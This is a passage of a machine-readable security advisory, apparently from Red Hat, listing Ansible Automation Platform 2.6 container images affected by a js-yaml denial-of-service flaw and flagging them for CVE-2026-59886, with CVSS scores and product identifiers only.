"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "js-yaml: js-yaml: Denial of Service via crafted YAML documents"
},
{
"cve": "CVE-2026-59886",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-14T17:01:19.689422+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
